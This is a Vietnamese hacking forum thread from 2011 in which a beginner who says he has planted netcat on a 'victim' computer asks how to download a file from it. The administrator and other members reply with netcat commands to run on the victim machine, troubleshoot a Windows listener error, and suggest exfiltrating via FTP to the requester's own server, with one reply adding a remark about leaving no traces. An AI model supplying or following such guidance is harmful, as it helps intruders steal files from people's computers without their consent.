banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Gửi & nhận file bằng netcat  XML
  [Question]   Gửi & nhận file bằng netcat 20/06/2011 13:52:22 (+0700) | #1 | 241479
whitesnow19
Member

[Minus]    0    [Plus]
Joined: 08/10/2010 03:42:19
Messages: 54
Offline
[Profile] [PM]
Tình hình là em đang tập tành ngâm cứu xâm nhập bằng netcat. Em đã cái thành công netcat lên máy victim. Đã có thể shutdown máy victim ngon lành. Nhưng tình hình là em thấy máy victim có file khongxem.rar. Tò mò muốn download file này về. Xin hỏi các anh các chị trong diễn đàn mình làm thế náo để gửi file bằng netcat (Vì hiện tại con đường duy nhất em chui vào máy tính victim là đường netcat đã đổ cmd.exe

Nếu đã có bài viết trên diễn đàn với vấn đề tương tự, xin anh chị comment cho em cái link vì em tìm mỏi mắt mà chẳng thấy.

Rất mong nhận được sự hồi đáp của các anh chị!

Newbie!

PS:Trên cả mạng Lan và Internet
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 07:24:38 (+0700) | #2 | 241535
whitesnow19
Member

[Minus]    0    [Plus]
Joined: 08/10/2010 03:42:19
Messages: 54
Offline
[Profile] [PM]
Tại sao không ai trả lời giúp mình vậy nè. Admin smod ơi, ai quản lý chuyên mục này vô cho ý kiến với. Nếu đã có bài tương tự thì cho mình biết để mình học tập với.

Trên mạng có cách gửi file bằng netcat với câu lệnh netcat [ip][port] >/< [filename]

Nhưng mình thực hiện thì không được.
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 12:32:39 (+0700) | #3 | 241569
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
netcat chạy trên Windows cực kỳ hạn chế vì thiếu những "lệnh" cần thiết mà chỉ có trên *nix mới có.

Thông thường để gởi và nhận files xuyên qua netcat (trên *nix) thì có hai phía:

1. Phía server gởi:
cat khongxem.rar | pv -b | nc -l <whatever port>

2. Phía client nhận:
nc <server ip> <whatever port> | pv -b > khongxem.rar

Những command cần thiết như "cat", "pv" hoàn toàn không có trên Windows cho nên chạy netcat trên Windows như trên không được. Bồ có thể thử thay thế "type" với "cat" và không dùng "pv" ở đây (không thể biết được biến thiên bao nhiêu % file được chuyển tải nếu không có pv).
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 12:45:08 (+0700) | #4 | 241571
[Avatar]
WinDak
Researcher

Joined: 27/01/2002 11:15:00
Messages: 223
Offline
[Profile] [PM]
Nếu đã có cmd.exe thì có rất nhiều cách, dễ nhất là có thể sử dụng ftp để transfer file lên 1 server nào đó ( hoặc tự biến máy mình thành ftp server). Ngoài ra nếu máy victim có http thì có thể copy đến http directory để download về v.v..
Quan trọng là làm thế nào mà download xong không để có dấu vết => vào bóc lịch thôi !
-- w~ --
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 15:27:43 (+0700) | #5 | 241588
Stanley_00
Member

[Minus]    0    [Plus]
Joined: 01/03/2011 06:21:38
Messages: 74
Offline
[Profile] [PM]

conmale wrote:
netcat chạy trên Windows cực kỳ hạn chế vì thiếu những "lệnh" cần thiết mà chỉ có trên *nix mới có.

Thông thường để gởi và nhận files xuyên qua netcat (trên *nix) thì có hai phía:

1. Phía server gởi:
cat khongxem.rar | pv -b | nc -l <whatever port>

2. Phía client nhận:
nc <server ip> <whatever port> | pv -b > khongxem.rar

Những command cần thiết như "cat", "pv" hoàn toàn không có trên Windows cho nên chạy netcat trên Windows như trên không được. Bồ có thể thử thay thế "type" với "cat" và không dùng "pv" ở đây (không thể biết được biến thiên bao nhiêu % file được chuyển tải nếu không có pv).
 


Em lại nghĩ bên server thì chỉ cần biết cái size của file thôi, rồi wwwect thôi, cái này win làm được mà smilie
Client thì chạy lệnh giống như trên.
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 15:27:44 (+0700) | #6 | 241589
whitesnow19
Member

[Minus]    0    [Plus]
Joined: 08/10/2010 03:42:19
Messages: 54
Offline
[Profile] [PM]
Thank anh Conmale nhé. Dù sao có comment của anh em cũng biết được hướng giải quyết: Tìm cách khác. ^^


Anh WinDak có thế nói rõ thêm cách transfer không? Vì đây em đang bàn luận trên mạng Lan nên không biết làm như thế nào trong môi trường Dos.
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 15:29:11 (+0700) | #7 | 241591
whitesnow19
Member

[Minus]    0    [Plus]
Joined: 08/10/2010 03:42:19
Messages: 54
Offline
[Profile] [PM]

Stanley_00 wrote:


Em lại nghĩ bên server thì chỉ cần biết cái size của file thôi, rồi wwwect thôi, cái này win làm được mà smilie
Client thì chạy lệnh giống như trên. 



Nói rõ đi bạn! Nói chung chung thế khó hiểu quá.Mình là newbie mà
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 15:41:28 (+0700) | #8 | 241593
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Thử:

trên server (máy của nạn nhân):
type khongxem.rar | nc -l 9876

trên client (máy của bồ):
nc <server ip> 9876 > khongxem.rar

thử được không?

Sao không chịu đọc kỹ và suy nghĩ một tí rồi làm thử, táy máy thử? Ngay cả cách sử dụng netcat cũng không chịu khó đọc và hiểu thì làm cái gì?

Muốn làm 'héc cờ' mà không chịu khó, kiên nhẫn, tìm tòi, thử nghiệm thì nên từ bỏ ý định ngay từ đầu vì phí thời gian vô ích mà chẳng đi tới đâu hết.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 15:47:55 (+0700) | #9 | 241595
whitesnow19
Member

[Minus]    0    [Plus]
Joined: 08/10/2010 03:42:19
Messages: 54
Offline
[Profile] [PM]

conmale wrote:
Thử:

trên server (máy của nạn nhân):
type khongxem.rar | nc -l 9876

trên client (máy của bồ):
nc <server ip> 9876 > khongxem.rar

thử được không?

Sao không chịu đọc kỹ và suy nghĩ một tí rồi làm thử, táy máy thử? Ngay cả cách sử dụng netcat cũng không chịu khó đọc và hiểu thì làm cái gì?

Muốn làm 'héc cờ' mà không chịu khó, kiên nhẫn, tìm tòi, thử nghiệm thì nên từ bỏ ý định ngay từ đầu vì phí thời gian vô ích mà chẳng đi tới đâu hết. 


Thưa anh, lệnh trên máy victim không hoạt động được. Ở đây em đang nói là mạng Lan nên điều tất nhiên cả victim lẫn serve đều là Window.

Em thử lệnh victim của anh thì nó lại ra như thế này

C:\>type log.txt | netcat -l 9876
local listen fuxored: INVAL

C:\>
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 16:12:47 (+0700) | #10 | 241599
Stanley_00
Member

[Minus]    0    [Plus]
Joined: 01/03/2011 06:21:38
Messages: 74
Offline
[Profile] [PM]

whitesnow19 wrote:

Em thử lệnh victim của anh thì nó lại ra như thế này

C:\>type log.txt | netcat -l 9876
local listen fuxored: INVAL

 


Trước hết bạn phải kiểm tra port lắng nghe chưa ai sử dụng, thứ 2 nghe đồn là pipe line với nc có chút vấn đề.
Mà anh conmale này, em thấy hình như anh thích dùng pipe line hơn là wwwect nhỉ, em nhớ là có đọc được ở đâu là nó nhanh hơn, nhưng vẫn không hiểu lắm. Anh giải thích hộ em được chứ?
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 16:27:17 (+0700) | #11 | 241602
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

whitesnow19 wrote:

conmale wrote:
Thử:

trên server (máy của nạn nhân):
type khongxem.rar | nc -l 9876

trên client (máy của bồ):
nc <server ip> 9876 > khongxem.rar

thử được không?

Sao không chịu đọc kỹ và suy nghĩ một tí rồi làm thử, táy máy thử? Ngay cả cách sử dụng netcat cũng không chịu khó đọc và hiểu thì làm cái gì?

Muốn làm 'héc cờ' mà không chịu khó, kiên nhẫn, tìm tòi, thử nghiệm thì nên từ bỏ ý định ngay từ đầu vì phí thời gian vô ích mà chẳng đi tới đâu hết. 


Thưa anh, lệnh trên máy victim không hoạt động được. Ở đây em đang nói là mạng Lan nên điều tất nhiên cả victim lẫn serve đều là Window.

Em thử lệnh victim của anh thì nó lại ra như thế này

C:\>type log.txt | netcat -l 9876
local listen fuxored: INVAL

C:\>
 


Có thể bồ dùng bản "netcat" này bị dính "GAPING_SECURITY_HOLE option" rồi. Cho nên bị antivirus trên máy block không cho tạo socket.

Tham khảo phiên bản không bị "GAPING_SECURITY_HOLE option" ở đây: http://www.rodneybeede.com/Compile_Netcat_on_Windows_using_MinGW.html
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 16:28:28 (+0700) | #12 | 241603
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

Stanley_00 wrote:

whitesnow19 wrote:

Em thử lệnh victim của anh thì nó lại ra như thế này

C:\>type log.txt | netcat -l 9876
local listen fuxored: INVAL

 


Trước hết bạn phải kiểm tra port lắng nghe chưa ai sử dụng, thứ 2 nghe đồn là pipe line với nc có chút vấn đề.
Mà anh conmale này, em thấy hình như anh thích dùng pipe line hơn là wwwect nhỉ, em nhớ là có đọc được ở đâu là nó nhanh hơn, nhưng vẫn không hiểu lắm. Anh giải thích hộ em được chứ? 


--> không nhất thiết. Tuỳ trường hợp, tuỳ mục đích.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Gửi & nhận file bằng netcat 21/06/2011 18:55:28 (+0700) | #13 | 241614
[Avatar]
WinDak
Researcher

Joined: 27/01/2002 11:15:00
Messages: 223
Offline
[Profile] [PM]

whitesnow19 wrote:
Thank anh Conmale nhé. Dù sao có comment của anh em cũng biết được hướng giải quyết: Tìm cách khác. ^^


Anh WinDak có thế nói rõ thêm cách transfer không? Vì đây em đang bàn luận trên mạng Lan nên không biết làm như thế nào trong môi trường Dos. 


Bạn nên tìm hiểu thêm các network protocol và cách thức hoạt động của netcat như anh comale nói, biết đâu có thể tự tìm được cách cho riêng mình

p/s: về ftp thì cứ google là biết lệnh thôi chứ gì, tham khảo link sau http://www.uic.edu/depts/accc/network/ftp/vftp.html, phần 10. lưu ý là lúc này ftp client là máy victim, còn ftp server là một máy chủ bất kì, có thể là máy của chính bạn nếu biết hiệu chỉnh.
-- w~ --
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|